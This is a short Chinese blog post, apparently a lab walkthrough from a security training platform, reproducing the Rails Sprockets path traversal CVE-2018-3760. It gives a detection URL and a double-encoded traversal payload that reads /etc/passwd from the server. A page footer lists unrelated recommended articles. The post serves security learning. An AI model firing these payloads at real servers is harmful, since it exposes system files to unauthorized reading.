墨者学院 Ruby On Rails漏洞复现第一题(CVE-2018-3760)

admin and root2023-11-07 14:15

打开 web 页面:

发现是Ruby,在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。可以先检测一下是否有此漏洞:

cs 复制代码 
/assets/file:%2f%2f/etc/passwd

根据报错路劲构造 payload:

/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

cs 复制代码 
/assets/file:///usr/src/blog/app/assets/images/../../../../../../etc/passwd
相关推荐
刺猬-----13 分钟前
OSPF多区域
网络
rannn_1111 小时前
【MySQL学习|黑马笔记|Day1】数据库概述,SQL|通用语法、SQL分类、DDL
数据库·后端·学习·mysql
超浪的晨1 小时前
JavaWeb 入门:HTML 基础与实战详解(Java 开发者视角)
java·开发语言·前端·后端·html·个人开发
程序员爱钓鱼1 小时前
Go语言实战案例-计算字符串编辑距离
后端·google·go
程序员爱钓鱼1 小时前
Go语言实战案例-判断二叉树是否对称
后端·google·go
Victor3561 小时前
MySQL(165)MySQL如何处理并发控制?
后端
chirrupy_hamal1 小时前
如何提升 TCP 传输数据的性能?详解
linux·网络·tcp
风象南2 小时前
用 4 张图解释 CAP 到底在纠结什么
java·分布式·后端
源远流长jerry2 小时前
网络编程概述与UDP编程
linux·服务器·网络·网络协议·udp
程序员良辰2 小时前
网络协议:计算机世界的“交通规则“与“社交礼仪“
网络·网络协议
热门推荐
01Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code02Coze 开源了,送上保姆级私有化部署方案【建议收藏】03扣子开源本地部署教程 丨Coze智能体小白喂饭级指南04全球最强模型Grok4,国内已可免费使用!(附教程)05KGG转MP3工具|非KGM文件|解密音频06腾讯还是太全面了,限时免费!超全CodeBuddy IDE保姆级教程!(附案例)0701-开源版COZE-字节 Coze Studio 重磅开源!保姆级本地安装教程,手把手带你体验08vue数据变化但页面不变09干翻 Typora!MilkUp:完全免费的桌面端 Markdown 编辑器!10【2025.7.18】更新vscode后所有.vue文件template标签后报红的临时解决办法,Vue - Official 插件3.0.2导致